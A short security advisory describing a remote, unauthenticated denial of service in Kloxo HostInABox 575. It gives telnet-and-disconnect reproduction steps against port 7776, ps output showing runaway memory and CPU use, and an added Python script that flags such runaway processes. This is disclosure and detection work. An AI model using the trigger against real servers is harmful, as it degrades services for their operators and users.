Kloxo HostInABox 575 - remote CPU and mem usage DoS



DESCRIPTION


Remote, unauthenticated users can cause Kloxo to consume all available server memory and CPU cycles simply by connecting to port 7776 and then disconnecting.



IMPACT


Remote, unauthenticated users could cause serious performance degradation of a server running Kloxo.

1. telnet x.x.x.x 7776
2. disconnect
3. observe that the most recent instance of kloxo will endlessly consume memory:

USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root     25872 98.6 15.7  45164 41348 pts/1    R    14:10   0:05      \_ ../sbin/kloxo.exe master
root     25872  101 29.3  80672 76932 pts/1    R    14:10   0:11      \_ ../sbin/kloxo.exe master
root     25872  100 34.3  93608 89916 pts/1    R    14:10   0:13      \_ ../sbin/kloxo.exe master
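
The growth pattern in the ps output above (one PID, CPU pinned near 100%, RSS rising in every sample) can be checked for automatically on a host running Kloxo. The following is an added example, not part of the original advisory or of Kloxo; the function names, the 90% CPU threshold and the three-sample minimum are assumptions chosen for illustration.

```python
from collections import defaultdict

# The three observations of PID 25872 from the advisory's ps output.
SAMPLES = r"""
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root     25872 98.6 15.7  45164 41348 pts/1    R    14:10   0:05      \_ ../sbin/kloxo.exe master
root     25872  101 29.3  80672 76932 pts/1    R    14:10   0:11      \_ ../sbin/kloxo.exe master
root     25872  100 34.3  93608 89916 pts/1    R    14:10   0:13      \_ ../sbin/kloxo.exe master
"""


def parse_ps(text):
    """Yield (pid, cpu_percent, rss_kib, command) from `ps aux`-style lines."""
    for line in text.splitlines():
        fields = line.split(None, 10)
        if len(fields) < 11 or not fields[1].isdigit():
            continue  # header, blank or malformed line
        yield int(fields[1]), float(fields[2]), int(fields[5]), fields[10]


def runaway_pids(text, name="kloxo.exe", min_cpu=90.0, min_samples=3):
    """Return {pid: rss_growth_kib} for processes whose command contains
    `name`, whose RSS strictly grows between consecutive samples and whose
    CPU stays at or above `min_cpu` (thresholds are assumed values)."""
    series = defaultdict(list)
    for pid, cpu, rss, command in parse_ps(text):
        if name in command:
            series[pid].append((cpu, rss))

    flagged = {}
    for pid, observations in series.items():
        if len(observations) < min_samples:
            continue  # not enough history to call it a trend
        rss = [r for _, r in observations]
        growing = all(later > earlier for earlier, later in zip(rss, rss[1:]))
        busy = all(cpu >= min_cpu for cpu, _ in observations)
        if growing and busy:
            flagged[pid] = rss[-1] - rss[0]
    return flagged


if __name__ == "__main__":
    for pid, growth in runaway_pids(SAMPLES).items():
        print(f"PID {pid}: RSS grew {growth} KiB while CPU stayed pinned")
```

In practice the input would be successive `ps aux` snapshots concatenated together; a flagged PID is a candidate for restart and for checking which remote addresses recently connected to port 7776.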